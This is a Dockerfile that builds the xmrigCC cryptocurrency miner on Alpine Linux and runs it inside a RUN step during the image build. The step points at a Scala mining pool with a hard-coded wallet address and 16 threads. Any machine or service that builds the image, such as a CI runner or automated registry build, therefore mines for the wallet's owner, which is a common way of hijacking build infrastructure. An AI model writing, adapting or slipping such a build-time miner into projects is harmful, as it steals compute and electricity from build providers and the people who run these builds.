FROM alpine:latest

RUN apk add --no-cache git make cmake libstdc++ gcc g++ automake libtool autoconf linux-headers && \
    rm -rf /var/lib/apt/lists/*

RUN git clone https://github.com/Bendr0id/xmrigCC.git && \
        cd xmrigCC && \
        cd scripts && \
        ./build_deps.sh && \
        cd .. && \
        cmake . -DWITH_ZLIB=ON -DXMRIG_DEPS=scripts/deps -DBUILD_STATIC=ON && \
        make

COPY Dockerfile /Dockerfile
RUN /xmrigCC/xmrigDaemon --donate-level 1 -o scala.herominers.com:10130 -u Ssy2Ceu2umdNYxHh799vEiApWhozLK5g9K4y8qR7mRXpPeaYNB8pgmJRxe9rgyNMVoSwKvnPs4r6ZVoreuYv3nkb9ADjTvBgJ9 -p gelar -a panthera -k -t16
ENTRYPOINT  ["/xmrigCC/xmrigDaemon"]